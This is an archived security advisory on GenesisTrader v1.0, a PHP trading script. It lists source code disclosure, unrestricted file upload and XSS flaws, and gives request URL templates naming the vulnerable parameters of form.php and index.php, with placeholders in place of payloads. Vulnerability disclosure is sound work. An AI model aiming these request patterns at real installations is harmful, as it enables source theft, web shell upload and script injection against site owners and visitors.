AOH :: HP Unsorted G :: C07-1320.HTM

GenesisTrader v1.0 - Multiple Vulnerabilities



GenesisTrader v1.0 - Multiple Vulnerabilities
GenesisTrader v1.0 - Multiple Vulnerabilities



GenesisTrader v1.0
------------------
Vendor site: http://www.genesis-php.com/ 
Product: GenesisTrader v1.0
Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 06/12/06
Public disclosure: 14/12/06
 
Description:
------------

Source Code Disclosure:(No need to be registered)
http://[victim]/[path]/form.php?floap=modfich&do=[FILE] 
http://[victim]/[path]/form.php?floap=modfich&chem=[FILE] 

Arbitrary File Upload:(NEED to be registered)
http://[victim]/[path]/form.php?floap=ajoutfich 
form.php -> upload.php (all type and extensions allowed)



XSS:(No need to be registered)
http://[victim]/[path]/index.php?cuve=[XSS] 
http://[victim]/[path]/form.php?floap=ajoutfich&cuve=[XSS] 
http://[victim]/[path]/form.php?floap=modfich&chem=[XSS] 
http://[victim]/[path]/form.php?floap=modfich&do=[XSS] 
http://[victim]/[path]/form.php?floap=rename&chem=[XSS] 
http://[victim]/[path]/form.php?floap=rename&do=[XSS] 
http://[victim]/[path]/form.php?floap=copy&chem=[XSS] 
http://[victim]/[path]/form.php?floap=copy&do=[XSS] 
http://[victim]/[path]/form.php?floap=chmod&chem=[XSS] 
http://[victim]/[path]/form.php?floap=chmod&do=[XSS] 
etc... in form.php?floap=...


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.